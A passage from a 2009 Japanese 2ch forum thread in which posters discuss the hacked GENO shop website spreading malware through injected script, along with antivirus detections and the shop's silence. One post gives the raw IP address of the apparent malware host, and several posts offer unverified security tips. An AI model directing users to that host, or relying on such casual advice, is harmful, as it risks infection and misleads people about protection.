今回検出出来たのもたまたまだろう
814 コスミレ(東京都):2009/04/07(火) 09:24:28.83 ID:8y99Mpqc
>>798
今年で一番被害者多いんじゃないの?ここ5年ウイルスとは無縁のオレでさえ
再インストールさせられたぐらいだから。
GENOなんて全く関心も無いし、知りもしなかったのだが、
zip偽装の短縮を踏んで飛ばされてアボーン。酷すぎる。
まあ、調子のって、マロにZIPを持っておじゃれ。とか言ってたからなんだがW
815 クロッカス(東日本):2009/04/07(火) 09:25:09.76 ID:v2pFr5JY
感染URLは?
816 コスミレ(東京都):2009/04/07(火) 09:27:28.84 ID:8y99Mpqc
>>813
まあ、そんな気はするけども、
全てを完全にスルーしたノートン先生よりはマシだろ。
なめてんのかと思ったよ。インタネットセキュリティだったら
防げたのかな?そっち入れてる人の状況知りたい。
817 クロッカス(東日本):2009/04/07(火) 09:27:48.28 ID:v2pFr5JY
http://94.247.2.195/

no siteってなってる
818 リナリア(アラバマ州):2009/04/07(火) 09:27:57.68 ID:Bel+1vHG
斧で手に入れたLa.exeに俺のBDちゃんは何時になったら反応してくれるんだろうか…
819 ダイセノダマキ(三重県):2009/04/07(火) 09:28:43.11 ID:NiHmB5na
感染したのかしてないのかわからんからスキャン廚
820 シナノコザクラ(福岡県):2009/04/07(火) 09:29:27.19 ID:se8lpk3k
Tempだけだったら電源切るだけで消えるから助かる
821 ニリンソウ(catv?):2009/04/07(火) 09:31:28.23 ID:dDs8JGri
ノートンインタネットセキュリティは完全スルーだった
822 チューリップ(神奈川県):2009/04/07(火) 09:31:31.34 ID:IPN2lPVo
>>814
httpのステータスコードの300番台を無視するような機能があれば、
その手の被害はかなり防げそうだな。
823 ドデカテオン メディア(catv?):2009/04/07(火) 09:32:08.27 ID:FwthmTsl
>>817
ブラクラ化して営業どころじゃなくなってたから閉じたのか。
824 ラナンキュラス(アラバマ州):2009/04/07(火) 09:35:20.53 ID:6H4/EZWZ
今のメンテって改竄の対処よりセールの準備っぽいな。。
825 タツナミソウ(catv?):2009/04/07(火) 09:36:04.11 ID:PlJLuSEz
>>824
このまま行くと閉店セールになりそうだなw
826 ドデカテオン メディア(島根県):2009/04/07(火) 09:36:32.66 ID:wl92jsLE
>>799
あったけど今のところ駆除できないんだよね?
827 リナリア(アラバマ州):2009/04/07(火) 09:37:20.89 ID:Bel+1vHG
今の状態でセールしたら凄いことになるだろうな…
セールだと言ってurl貼りまくる奴が現れるだろうし、阿鼻叫喚な図が予想されるw
828 オウレン(大阪府):2009/04/07(火) 09:37:36.22 ID:KkHktETZ
東大生が飲酒運転で事故をmixiで報告
ttp://tsushima.2ch.net/test/read.cgi/news/1239052782/

現在祭り中です。
魚拓と証してzipなどのURL短縮ウイルスを
混ぜて貼らないように注意お願いします。
祭りには短縮ウイルスのことを知らない人も
たくさんいますので絶対に短縮ウイルスの
URLを貼らないように注意おねがいします
829 ダイセノダマキ(三重県):2009/04/07(火) 09:38:56.12 ID:NiHmB5na
ウイルスを踏まないと買えない閉店セールとか。
それでもバックアップあるから、俺は買うぞ!
830 ミミナグサ(東京都):2009/04/07(火) 09:39:31.06 ID:Xq600thG
謝った方がいいと思うんだがなぜしないんだ
別に訴訟起こされる訳でもあるまいし
831 トベラ(関東・甲信越):2009/04/07(火) 09:39:32.88 ID:4hDYUwJQ
かぁちゃんのパソコンが感染してた
誰だよ鬼女板にはったやつは
832 アルメリア(長屋):2009/04/07(火) 09:40:03.17 ID:/OfJUrDu
GENOは福袋でジャンク入れてきて
クレームは全てガン無視
商品の程度も悪いしサポートは最悪

今回も何事も無かったように営業継続です
833 タツタソウ(福岡県):2009/04/07(火) 09:40:40.43 ID:0EhaQgLq
再インストールするついでに丸4年使ってきたHDD変えたいから
WDかSGが日立のIDEHDDの容量大きくて安いやつ紹介してくれw
834 シロウマアサツキ(埼玉県):2009/04/07(火) 09:40:56.64 ID:uUJ7vfAt
>>828
  |押すなよ!
  |絶対に押すなよ
    ̄ ̄ ̄|/ ̄ ̄ ̄
 ○   ○
 に  /|
 >ヽ |⌒|____|
835 ミヤマヨメナ(愛知県):2009/04/07(火) 09:41:39.47 ID:ucL2V9Sc
>>833
GENOで買えば?
836 ナノハナ(中国・四国):2009/04/07(火) 09:43:21.29 ID:BNmZ1+M+
>>828
ダチョウ倶楽部かよ
837 バーベナ(アラバマ州):2009/04/07(火) 09:44:32.40 ID:Qb4JmALV
>>694
g,""));
838 キクザキイチゲ(アラバマ州):2009/04/07(火) 09:44:39.52 ID:YN1tAqVb
ありゃ? またメンテ中?
839 ニリンソウ(東京都):2009/04/07(火) 09:44:43.21 ID:fnlCOsDP
ネトゲだと結構前からある手だけど
何の情報抜いてんだろうな
840 トベラ(関東・甲信越):2009/04/07(火) 09:44:54.94 ID:4hDYUwJQ
そういえばフレッツウイルスクリアでも検出された
841 トリアシスミレ(長屋):2009/04/07(火) 09:45:04.50 ID:1u8sEID5
URL偽装って短縮urlサイトを悪用した末尾偽装だけ?
それともいくらでも自由に偽装できるもんなの?
後者なら実在の安全なサイトのrulを少しいじった感じに偽装、とか全く見分けようないな…。
842 ヤマシャクヤク(関西):2009/04/07(火) 09:45:19.13 ID:/2jY6pW+
>>833
ヤフオクで探せ
843 ヤエヤマブキ(catv?):2009/04/07(火) 09:48:52.44 ID:zltZU2Gu
osusume.js, osusume_shouhin.js にまだ残ってるぞwwwwwwww
844 トキワハゼ(東京都):2009/04/07(火) 09:51:04.49 ID:CdfLizCn
>>843
お勧めなら仕方がない
845 クロッカス(東日本):2009/04/07(火) 09:51:07.53 ID:v2pFr5JY
>>823
>>817はラトビアのアドレス。
846 マンサク(岩手県):2009/04/07(火) 09:52:29.35 ID:a+URb3FB
GENOの力じゃ復旧は無理だな
847 ドデカテオン メディア(島根県):2009/04/07(火) 09:53:34.48 ID:wl92jsLE
ノートンじゃ検出できないんだよね?
PC初心者だからよくワカンネ
848 キエビネ(千葉県):2009/04/07(火) 09:54:06.08 ID:EGTFuo2i
>>173が例のウイルス?
849 カタクリ(アラバマ州):2009/04/07(火) 09:54:23.85 ID:uolFsfZk
GENOなんて知らんけどおまえらあちこちに種まいてたりすんの?
janeの自動画像DL切っといた方がいい?
850 アグロステンマ アゲラタム(アラバマ州):2009/04/07(火) 09:54:41.70 ID:F3zLYXU/
いやいやマカフィー入れてみた
La.zipがサクッと反応してサクッと消しやがった
なんかマカフィーのくせにムカツクw
851 ミミナグサ(東京都):2009/04/07(火) 09:54:46.32 ID:Xq600thG
GENO・・・・メンテナンスしてまだウイルス配布してるじゃんか・・・
おいどうなってるんだこのPCショップは・・・
852 オウレン(大阪府):2009/04/07(火) 09:54:55.85 ID:KkHktETZ
東京大学 理科一類の学生が飲酒運転で事故をmixiで報告
ttp://tsushima.2ch.net/test/read.cgi/news/1239052782/

現在祭り中です。
それらしく短縮ウイルスを貼らないように
注意お願いします。 祭りには短縮ウイルス
のことを知らない人も たくさんいますので
悪ふざけで絶対に短縮ウイルスの URLを
貼らないように注意おねがいします。
なお本人を含め、東大の方々がスレにいらっしゃる
恐れがあるので決して悪ふざけはしないように
おねがいします。では。
853 ミミナグサ(東京都):2009/04/07(火) 09:55:28.60 ID:Xq600thG
>>848
専ブラなら問題ない
854 カタクリ(catv?):2009/04/07(火) 09:56:13.45 ID:Nz2aOKAR
しかしどういった経緯でそういう事態になったんだろな
855 オキナワチドリ(岩手県):2009/04/07(火) 09:56:36.94 ID:yOFciNDi
>>852
そういうコピペはアク禁対称だからな?
856 ニリンソウ(catv?):2009/04/07(火) 09:56:38.58 ID:dDs8JGri
857 ミミナグサ(東京都):2009/04/07(火) 09:58:26.89 ID:Xq600thG
俺も二回小沢のAA貼って●焼かれて二度とコピペしなくなったわ
漫画喫茶からいいんじゃね
858 オウレン(大阪府):2009/04/07(火) 09:58:27.37 ID:KkHktETZ
>>855
私はアク禁対象になる方を未然に防ぐ目的ですので
良心から出た行為をアク禁対象にするとは思えません。
859 ジョウシュウアズマギク(埼玉県):2009/04/07(火) 09:59:45.33 ID:xUULCnhB
理由が何だろうがマルチはアク禁対象だ
860 ジンチョウゲ(大阪府):2009/04/07(火) 09:59:45.59 ID:CvQBCuwW
>>287
遅レスだがCookieSafeマジお勧め
861 ドデカテオン メディア(島根県):2009/04/07(火) 09:59:46.80 ID:wl92jsLE
>>848
自分は
janeで踏んだんだけどエラーで表示されなかった
再起動しても問題なかったみたいだけど
アンチウイルスソフトavastだとキャッシュからトロイが検出されるらしい
試してないからよく分からん
862 サイネリア(栃木県):2009/04/07(火) 10:01:36.21 ID:cc2QZmb2
java止めたからアニメ見られないお・・・
863 コスミレ(東京都):2009/04/07(火) 10:01:44.01 ID:8y99Mpqc
>>858
そんな言い訳、2ch運営に通じるわけないだろ。
興味ないからって理由でYBBを1ヶ月規制したような
連中だぞw
一応、おまえの書き込み全部報告しておくから規制は確実だろうな。
864 ゲンカイツツジ(長屋):2009/04/07(火) 10:01:55.93 ID:iaH3XBff
とりあえず、ゲノがマトモな店じゃないのはよくわかった。
865 オウレン(大阪府):2009/04/07(火) 10:02:47.21 ID:KkHktETZ
アク禁ワロタ
866 チューリップ(東京都):2009/04/07(火) 10:03:38.13 ID:14WqtCZK
上流の有線に連絡してるよな?
867 サイネリア(栃木県):2009/04/07(火) 10:04:48.42 ID:cc2QZmb2
>>864
だな
店がウィルスで荒らされてるってのに無反応とか狂ってる

絶対ゲノでは買い物しないことに決めたわ
868 モクレン(石川県):2009/04/07(火) 10:05:50.28 ID:jLm5dvjo
>>865
アク禁にはならんよ
書き込みができなくなるだけだから
869 ショウジョウバカマ(群馬県):2009/04/07(火) 10:05:55.17 ID:fRCKqhzw
まだ対応してないのか?
870 レウイシア(千葉県):2009/04/07(火) 10:06:09.79 ID:h4yFrWTi
誰かスラドに記事投稿してくれませんか。
投稿しようと記事入力してたけど、オレには文才が無い事を忘れてた。
少しでもウィルス被害を食い止める為に、多くの人に知らせる必要があると思います。
871 ジンチョウゲ(大阪府):2009/04/07(火) 10:06:28.10 ID:CvQBCuwW
>>821
何時パターンファイルアップデートしたの?
今朝(am7:00)の段階で検出出来る様になってるよ
872 ドデカテオン メディア(島根県):2009/04/07(火) 10:07:08.41 ID:wl92jsLE
>>853
専ブラなら問題ないの?
まじで?
873 ノゲシ(兵庫県):2009/04/07(火) 10:09:09.47 ID:J/8Gy4K/
さすがカスペちゃんや!ようやってくれた!
874 チューリップ(東京都):2009/04/07(火) 10:09:41.45 ID:14WqtCZK
GIGAZINEあたりが取り上げてくれないかな
875 セキチク(東京都):2009/04/07(火) 10:10:05.20 ID:Z0gQjuOB
>>872
特殊な設定にしてた場合は別だけど
jpgの場合は、ビュアーで開くだろ?
ビュアーはファイルが実はhtmlだったとしてもjavascriptを実行しないから問題無い
876 フサアカシア(catv?):2009/04/07(火) 10:10:07.27 ID:Jsd5PteU
la.zip

Virus.Dropper, Trojan dropper
877 シラン(中国・四国):2009/04/07(火) 10:10:16.30 ID:NBL6O4ex
>>864
福袋の頃から怪しい店だなと思っていたよ。
でもまさかウイルスとは・・・涙
職場のPC感染させてしまった。
スクイズを気をつけていたのに2ストライクになって安心したところで決められた心境。
878 ニリンソウ(catv?):2009/04/07(火) 10:10:40.28 ID:dDs8JGri
>>872
日曜早朝に踏んでさっきほどバックアップから復元したんで
昨日以前のパターンファイル
今はVirtual PCで探りに行ってる
879 ニリンソウ(catv?):2009/04/07(火) 10:12:05.01 ID:dDs8JGri
アンカー間違えたw
>>871
880 ボロニア・ピンナタ(長屋):2009/04/07(火) 10:12:47.67 ID:izpoIvzz
>>757
専ブラプレビューはセーフ
881 ドデカテオン メディア(島根県):2009/04/07(火) 10:12:48.04 ID:wl92jsLE
今朝からノートンでも検出できるようになったみたいだから
スキャンしてみる
後は神のみぞ知る
882 デージー(東京都):2009/04/07(火) 10:13:14.49 ID:FtoSuOW2
良品中古
WindowsXP Proインストール済み

というPCがウイルスに感染していてもスルーされるわけだな、GENOでは。
883 オウレン(埼玉県):2009/04/07(火) 10:14:43.37 ID:J9fZ7s49
GENOもあほだけど感染者もあほだよ
884 ツゲ(東京都):2009/04/07(火) 10:16:32.92 ID:0RcLjI3w
俺、もうAviraだけじゃ怖いからavastと二大体制でいくわ・・・
マジGENOしね、二度とかわねーよ
885 クロッカス(東日本):2009/04/07(火) 10:17:03.91 ID:v2pFr5JY
>>884 どっちかにしなよw
886 レウイシア(千葉県):2009/04/07(火) 10:17:25.48 ID:h4yFrWTi
10時回ったのでgenoサイト見てきたけど、変化無し。
でも、トップページだけ差替えで、後は放置って、まだ事の重大さに気付いていないようですね。

入れてて良かったandLinux
887 ツゲ(東京都):2009/04/07(火) 10:18:49.19 ID:0RcLjI3w
>>885
とあるサイトに飛び込んだらaviraが反応した(調べた結果ウイルスだった)
別のサイトに飛んだらAvira反応なしでavastが反応した(上記同様)

別に実感できるほど重くなってないからこのまま行く・・・
888 キンケイギク(岩手県):2009/04/07(火) 10:19:18.01 ID:UgK5d5tM
AVGは更新きたの?
889 ねこやなぎ(長屋):2009/04/07(火) 10:19:39.14 ID:Ej6qxMGK
GENO以外で危険な所って有ったの?
890 ムラサキナズナ(大阪府):2009/04/07(火) 10:19:39.59 ID:gbiHC9/K
まあ今回ばかりはVista大勝利だなw
891 モモイロヒルザツキミソウ(福井県):2009/04/07(火) 10:20:02.53 ID:P9fgBqgd
>>888
アップデート AVG - AVI 270.11.44/ 2044
検出の増強 新種のトロイの木馬 Generic13.UQF, Downloader.Delf.CFR, SHeur2.ZOQ, BHO.IHI, Dropper.VB.CCR, Worm/VB.FIG

2009 年 4 月 6 日
892 リナリア(アラバマ州):2009/04/07(火) 10:20:09.65 ID:Bel+1vHG
>>884
俺も2AVにしたわ
BDとClamAVこれでかつる!
893 クロッカス(東日本):2009/04/07(火) 10:20:59.62 ID:v2pFr5JY
>>700
また他力本願ww
894 ミツマタ(アラビア):2009/04/07(火) 10:21:14.47 ID:qT0OJ6EK
上の「トップページ」以外をクリックすると
左にメニューが表示されるけど
そこをテキトーにクリックすると発動するから気をつけろ

しかし何なんだこの低レベルな対策は…
895 モクレン(石川県):2009/04/07(火) 10:21:28.09 ID:jLm5dvjo
Vista厨大勝利!
XP厨ざまあwww
896 ムラサキナズナ(アラバマ州):2009/04/07(火) 10:22:01.40 ID:oJtuDS3V
感染した
avastとa-squadでフルスキャン
ATFクリーナーでテンポラリ全滅
リーダー&フラッシュをアップデート
ラトビアIPを遮断

不振な動きは無いけど心配だな
897 ボロニア・ピンナタ(長屋):2009/04/07(火) 10:22:53.74 ID:izpoIvzz
>>872
仕込まれたスクリプトが実行されない限り大丈夫だと思う
専ブラは画像だけ取得しただけだから問題ないはず。
IEコンポとかのブラウザでアクセスしたら問題あるだろう
898 セントウソウ(長屋):2009/04/07(火) 10:22:54.40 ID:1sxysAiy
>>895
ハンカチ貸してくれよ
899 コブシ(大阪府):2009/04/07(火) 10:23:37.41 ID:lj38xfda
XPだがadobeのFlashもReaderも最新だった俺はなんともなかったようだ
900 クロッカス(東日本):2009/04/07(火) 10:24:09.67 ID:v2pFr5JY
>>745
ヴェクターすごいw
901 オウレン(埼玉県):2009/04/07(火) 10:24:11.40 ID:J9fZ7s49
今度はブロックされるけど内容は表示されるんだな
902 ボロニア・ピンナタ(長屋):2009/04/07(火) 10:24:13.60 ID:izpoIvzz
ところで、ノートン今日のアップデータで削除までしっかり対応したの?
903 セキチク(関西地方):2009/04/07(火) 10:24:31.26 ID:A+H9NpvZ
とりあえずオレが管理者なら鯖を落としとくわ。
904 シザンサス(北海道):2009/04/07(火) 10:24:33.24 ID:1AT369Zt
そもそもPDF再生ソフト無いから無問題だった
905 マンネングサ(大阪府):2009/04/07(火) 10:24:52.67 ID:WwzL1JDC
スパイウェア対策ソフトでオススメどれだよ
906 プリムラ・ヒルスタ(関西地方):2009/04/07(火) 10:25:02.10 ID:KYAPlMB5
鯖落とせばいいのに
なんか鯖落としちゃダメって契約でもあんの?
907 ボロニア・ピンナタ(長屋):2009/04/07(火) 10:26:26.48 ID:izpoIvzz
>>906
目先の営業利益しか考えてないか、今回のことを軽視しているか
知識0のやつらしかいない。のどれかだな
908 ニガナ(関西地方):2009/04/07(火) 10:27:11.92 ID:SEjixqL4
>>907
というかGENOだと全部当てはまってるだろw
909 西洋オダマキ(東日本):2009/04/07(火) 10:28:09.81 ID:M55HmvE0
そもそもjavascriptいらんよな、こんなシンプルなサイトなら
910 イワザクラ(catv?):2009/04/07(火) 10:28:21.82 ID:+QGovsZO
>>876
ノートン
911 ピンクパンダ(dion軍):2009/04/07(火) 10:28:46.69 ID:b812AeUe
意外と、単にシャットダウンの仕方がわからないだけだったりして
912 クロッカス(東日本):2009/04/07(火) 10:28:48.39 ID:v2pFr5JY
>>896
ウェブシールドつけてたら感染から遮断してくれるはずなんだが。
913 カンパニュラ・サキシフラガ(大阪府):2009/04/07(火) 10:29:33.19 ID:xLJJRuyw
誰かマスコミうごかせよ。
総力挙げようぜ
914 デージー(東京都):2009/04/07(火) 10:29:52.06 ID:FtoSuOW2
>>907
土日は休みたい
月曜日はやる気が起きない
原因解明とかやりたくない
そもそもそんな知識もない
謝罪とかメンドクサイ
とにかく売上が無くなるのは嫌だ

という事だろう。
915 モクレン(石川県):2009/04/07(火) 10:30:23.20 ID:jLm5dvjo
ウイルス仕掛けられたのは被害者として同情するがその後の対応が酷すぎる
約二日間放置とか言い訳できないだろう
916 ボロニア・ピンナタ(長屋):2009/04/07(火) 10:30:52.06 ID:izpoIvzz
そろそろ3日になるのか
ν速も3日ルールだっけ?
917 クロッカス(東日本):2009/04/07(火) 10:31:29.00 ID:v2pFr5JY
>>758
AVG,Avast!Aviraに送っといた。
918 ハチジョウキブシ(関西地方):2009/04/07(火) 10:31:30.94 ID:dKQ+KUS4
画面回転のホットキーがCtrlだかAlt、Homeボタンで勝手に動作
左キーが連続で効かない。多分ウイルス関係ないが、なんだこれ
919 ヤマブキ(アラバマ州):2009/04/07(火) 10:32:07.31 ID:ghxs2O0D
>>914
それだと
もうGENOはつぶれるしかないな。
920 ヘビイチゴ(アラバマ州):2009/04/07(火) 10:32:19.39 ID:lhyoCUbm
>>916
同一ソースなら・・・つーかそもそもソースすら無いからな
そろそろどこかニュース記事にしても良さそうだけど
921 キンケイギク(岩手県):2009/04/07(火) 10:32:24.95 ID:UgK5d5tM
>>891
来てたのか。 更新したらGENO行っても平気?
922 レウイシア(千葉県):2009/04/07(火) 10:32:37.49 ID:h4yFrWTi
>>918
とりあえず、画面のプロパティ開いて、そこから直せばいいとおもう。
923 アヤメ(東京都):2009/04/07(火) 10:33:55.22 ID:0+Xik6vq
    ,ィィr--  ..__、j
   ル! {       `ヽ,       ∧
  N { l `    ,、   i _|\/ ∨ ∨
  ゝヽ   _,,ィjjハ、   | \
  `ニr‐tミ-rr‐tュ<≧rヘ   >   これはGENOが仕掛けた新手のSEOだったんだよ
     {___,リ ヽ二´ノ  }ソ ∠ 
    '、 `,-_-ュ  u /|   ∠
      ヽ`┴ ' //l\  |/\∧  /
--─‐ァ'| `ニ--‐'´ /  |`ー ..__   `´
    く__レ1;';';';>、  / __ |  ,=、 ___
   「 ∧ 7;';';'| ヽ/ _,|‐、|」 |L..! {L..l ))
   |  |::.V;';';';'| /.:.|トl`´.! l _,,,l | _,,|  , -,
    ! |:.:.:l;;';';';'|/.:.:.:||=|=; | |   | | .l / 〃 ))
    l |:.:.:.:l;';';'/.:.:.:.:| ! ヽ \!‐=:l/ `:lj  7
    | |:.:.:.:.l;'/.:.:.:.:.:.! ヽ:::\::  ::::|  ::l /
924 ショウジョウバカマ(群馬県):2009/04/07(火) 10:34:30.47 ID:fRCKqhzw
>>919
今の時点で潰れるのは確定だろ
925 カラスノエンドウ(関東・甲信越):2009/04/07(火) 10:34:41.78 ID:dlXMCjBM
警察がうごいてもいい頃合いだな
926 オウレン(大阪府):2009/04/07(火) 10:34:44.96 ID:KkHktETZ
日曜の深夜にマクドの無料クーポン祭りで短縮ウイルスの存在を知ったが
もし日曜の午前〜夕方にかけて2chやってたら間違いなく引っかかってたと思う。
927 オウレン(埼玉県):2009/04/07(火) 10:34:54.20 ID:J9fZ7s49
ttp://up.mugitya.com/img/Lv.1_up90802.png
本社HPもメンテなのにまだあるんだな
928 デージー(東京都):2009/04/07(火) 10:34:57.94 ID:FtoSuOW2
>>919
潰れるでしょ、このままじゃ。
929 ツゲ(東京都):2009/04/07(火) 10:35:05.80 ID:0RcLjI3w
これはVistaを買わせたいMicrosoftの壮大な陰謀

GENOは被害者、悪くない
930 ヤエヤマブキ(大阪府):2009/04/07(火) 10:35:05.55 ID:95PGP/4e BE:1028664656-2BP(1122)

4月5日から7日にかけて当サイトが改竄され、悪意あるスクリプトが掲載されておりました。
当社としては警察など、公的機関への通報等・・・・・
また、その間にアクセスをされたお客様はウイルス対策ソフトの各種スキャンをご利用云々


そのうち絶対こういうことトップに書くんだろうなぁ
931 ナツグミ(東京都):2009/04/07(火) 10:36:42.02 ID:AcmbGxKR
avastつかっててよかったカー!!!

オーー!!!!!!!!1

ウンチヴァ捨ててよかったカー!!!

オーー!!!!!!!!!!!!!1
932 カラスノエンドウ(関東・甲信越):2009/04/07(火) 10:37:32.85 ID:dlXMCjBM
>>930
まともなとこなら日曜に出すレベル
933 アクイレギア・スコプロラム(アラバマ州):2009/04/07(火) 10:38:01.52 ID:MqjOLvmr
あくまで不具合で通すんじゃね?
934 トベラ(関東・甲信越):2009/04/07(火) 10:38:36.18 ID:4hDYUwJQ
俺のちんこもたたないんだけどこのウイルスのせいか
935 ヒメスミレ(北海道):2009/04/07(火) 10:40:31.85 ID:earOwq6p
なんでGENOのURLないのかわらえるw
936 クワガタソウ(アラバマ州):2009/04/07(火) 10:41:05.75 ID:GfFls6e/
VPCでGENOに飛んで、メンテ中のページからカートの中身を見て、
ウィルスセキュリティZEROを表示させた後にTemporaryInternetフォルダを
チェックしたらしっかりとウィルスのスクリプトが残ったw

テキストにリネームしてVPC用の共有フォルダに保存したんだけど、
テキスト貼ったらまずいかな?
937 ニガナ(関西地方):2009/04/07(火) 10:41:31.04 ID:SEjixqL4
>>930
それ書くなら昨日書いてるだろ
昨日書かなかったってことはこれからも謝罪する気はないんだろw
938 カンパニュラ・サキシフラガ(大阪府):2009/04/07(火) 10:41:49.04 ID:xLJJRuyw
             _,,..r'''""~~`''ー-.、
            ,,.r,:-‐'''"""~~`ヽ、:;:;:\
           r"r          ゝ、:;:ヽ
   r‐-、   ,...,, |;;;;|       ,,.-‐-:、 ヾ;:;ゝ
   :i!  i!  |: : i! ヾ| r'"~~` :;: ::;",,-‐‐-  `r'^!
    !  i!.  |  ;| l|  ''"~~   、      i' |
     i! ヽ |  | |    ,.:'"   、ヽ、   !,ノ
    ゝ  `-!  :| i!  .:;: '~~ー~~'" ゙ヾ : : ::|
   r'"~`ヾ、   i! i!   ,,-ェェI二エフフ : : :::ノ~|`T <イエーイ、GENOの社員見てるー?
  ,.ゝ、  r'""`ヽ、i! `:、   ー - '" :: : :/ ,/     はよ職安いけよーwwwwwww
  !、  `ヽ、ー、   ヽ‐''"`ヾ、.....,,,,_,,,,.-‐'",..-'"
   | \ i:" )     |   ~`'''ー---―''"~
   ヽ `'"     ノ
939 アグロステンマ アゲラタム(アラバマ州):2009/04/07(火) 10:41:59.24 ID:F3zLYXU/
C:\Documents and Settings\ユーザ\Local Settings\Temp\ Rnu6d2Pn.zip
とりあえずこんな名前のzipがDropper.efで引っかかった
とにかく感染してたらZIP作るってこと?
940 オニノゲシ(コネチカット州):2009/04/07(火) 10:43:29.06 ID:RPctKvVK
avastでも
シールドが「標準」だと感染確認
「高」か、適切に設定した「カスタム」でマルウェア拒否

avastで安心してるやつは気を付けろ
941 カタクリ(北海道):2009/04/07(火) 10:44:50.85 ID:7MUmuId/
2ちゃんで宣伝なんかしてるから目つけられるんだよ
942 オウレン(大阪府):2009/04/07(火) 10:44:56.43 ID:KkHktETZ
おまえら短縮ウイルスをzipスレに貼ったりしたのか?
あんなの本物と混ぜられたら防御不可能だろ。鬼過ぎるぞ。
943 オウレン(埼玉県):2009/04/07(火) 10:46:00.66 ID:J9fZ7s49
嘘を嘘と〜のコピペ貼れよ
944 ノゲシ(東京都):2009/04/07(火) 10:46:18.19 ID:KNyqEIZi
作ったシステム会社のHPにgenoのシステム概要が載ってるな
http://www.it-solution.jp/casestudy/geno/index.html

どこまで情報を抜かれてしまっているのか・・・
945 モクレン(石川県):2009/04/07(火) 10:46:32.22 ID:jLm5dvjo
>>942
そんなもん引っかかるやつが悪いだろ
zip(笑)
946 サポナリア(埼玉県):2009/04/07(火) 10:47:10.55 ID:dOg2UIpr
まだGENOにアクセスすると感染するんか?
947 ユキノシタ(catv?):2009/04/07(火) 10:48:06.89 ID:tphrBWQ5
>>942
お前そればっかりだな
948 ミツバツツジ(神奈川県):2009/04/07(火) 10:48:18.16 ID:Fhsw18P+
みてらんねーわw
GENOの鯖ってどこにあるの?
近所なら手伝ってやるよ
949 オウレン(大阪府):2009/04/07(火) 10:48:47.29 ID:KkHktETZ
>>945
ひっかかるだろw
このスレの存在を知っててもこのスレを開いて読まないと
短縮ウイルスの貼られ方とかわからない。このスレスルー
してたけど日曜の深夜に読んでみてぞっとしたよ。
普段zipスレいたけど日曜の午後にいなくてよかったと心底
ほっとした。
950 キクザキイチゲ(catv?):2009/04/07(火) 10:48:49.02 ID:I/OLm0/T
>>946
トップからリンク踏んで中入ってくと感染する
951 チューリップ(東京都):2009/04/07(火) 10:48:59.40 ID:14WqtCZK
SEOワロタ
952 カンパニュラ・サキシフラガ(大阪府):2009/04/07(火) 10:49:40.54 ID:xLJJRuyw
誰か今回の内容を、後世に残るような名AAにしてくれ
953 オウレン(大阪府):2009/04/07(火) 10:50:14.26 ID:KkHktETZ
>>947
さっきのとは違って今回はまじな感想だよ。
過去スレ読んでzipスレに混ぜてるレスとか
読んだけど本当に鬼だなって思ってな。
zipスレなんて混ぜられたら絶対に気付かないもん。
954 アメリカフウロ(アラバマ州):2009/04/07(火) 10:50:19.78 ID:Qp0KSGEY
こんなセキュリティ体制ゆるゆるのいい加減なショップで買い物するやつもういないだろ
955 パンジー(コネチカット州):2009/04/07(火) 10:53:45.82 ID:7bgVIM1W
>>954
ゆるかわセキュリティー
これから流行るな、うん
956 リナリア(アラバマ州):2009/04/07(火) 10:54:36.47 ID:Bel+1vHG
zipスレなんぞウイルス貼られても大丈夫だろw
あいつらどんだけのURLを掻い潜ってきたと思ってるんだ
基本的に仮想使ってるだろjk
957 ジロボウエンゴサク(愛知県):2009/04/07(火) 10:55:18.08 ID:JaBgbhXx
小悪魔セキュリティとかもありだな
958 ヒイラギナンテン(dion軍):2009/04/07(火) 10:55:23.16 ID:Ty8D+Mqj
怖くてgeno見てないんだが、唯のお詫びしか載せてないの?
どんな問題があって何処を改修したのかとか、ユーザはその後どう対処すれば良いか記載するのが運営者の責務だと思うんだけどねえ
959 ムシトリナデシコ(アラバマ州):2009/04/07(火) 10:55:23.81 ID:kjOmRgCw
         ,、          _
      / l          ヽヽ
      ,′|          ヘ ヽ
      l  l           l ヘ
      |  l           l. l
      | ヘ              l  |
      ヘ  ヽ         /  j
      ヽ  \ , -┬┬、/.  /
       \   7   ヽ ヽ_∨
         ヽ  l   .  二 --`ゝ
          /ゝ' _.. '-'´ ・   ・ ヽヽ
         j−'´ |  =   _人  ~ l 〉 <セキュリティ〜♪
        / ̄ ̄l         ノ´
         / ̄ ̄~|      _.. ィ‐┐
        ゝ──'>ー<二○'´i ̄
           `ー┐      l
            _」      つ
           ゝ───…  ̄
         /
      ⌒ヽ/
960 チューリップ(東京都):2009/04/07(火) 10:56:27.96 ID:14WqtCZK
小悪魔age派
961 トキワハゼ(東京都):2009/04/07(火) 10:57:19.94 ID:CdfLizCn

┏━━━━━━━━━━━━━━━━
┃ >サーバーに一部不具合がございました  
┃ 分かったかボケなす
┃          人    
┃          <。 .>    
┃    ∧_∧.  /Vミ バシ!!
┗━━(´・∀・`)/ ミ━━━━━━━━━
    /) y )つ     
 |~ ̄] ̄ ̄ ̄ ̄ ̄ ̄|
962 ハルジオン(コネチカット州):2009/04/07(火) 10:58:18.50 ID:RPctKvVK
>>960
とか言いながらsageんなwwww
963 ボロニア・ピンナタ(長屋):2009/04/07(火) 10:58:26.70 ID:izpoIvzz
なぜ頑なに無言を決め込むんだ
964 キンケイギク(茨城県):2009/04/07(火) 10:58:38.27 ID:qBKuVinG
そもそもここは
新品と表記しといて中古で送るようなとこでしょ
965 モリシマアカシア(東京都):2009/04/07(火) 10:59:28.21 ID:fhtlRrYZ
再起動かけたけど無問題なおれセーフ?
966 オウレン(大阪府):2009/04/07(火) 10:59:40.66 ID:KkHktETZ
>>956
仮想でやってるのか。
おまえらまじですごいな
967 キンケイギク(茨城県):2009/04/07(火) 10:59:55.44 ID:qBKuVinG
ショップ情報が価格comから消滅したな
968 トキワハゼ(東京都):2009/04/07(火) 10:59:58.83 ID:CdfLizCn
>>965
今回のウイルスはステルスタイプだから
むしろ再起動かけたらまずい
969 ナツグミ(長屋):2009/04/07(火) 11:00:03.40 ID:VCMWvd8p
>>852が探偵ファイルで取り上げられたな
誰かこっちも調査依頼してこいよ
970 ジロボウエンゴサク(愛知県):2009/04/07(火) 11:00:21.04 ID:JaBgbhXx
>>965
いい機会だし諸々のパスワード変更しておいた方がいいな
971 モリシマアカシア(大阪府):2009/04/07(火) 11:00:22.86 ID:jaXLtBhk
これって何処の消費者センターに相談すれば良いんだ?
地元の都道府県でおk?GENOの本社が有る所が良いのか??
972 モリシマアカシア(東京都):2009/04/07(火) 11:00:32.22 ID:fhtlRrYZ
>>860thx
973 ボロニア・ピンナタ(長屋):2009/04/07(火) 11:00:58.97 ID:izpoIvzz
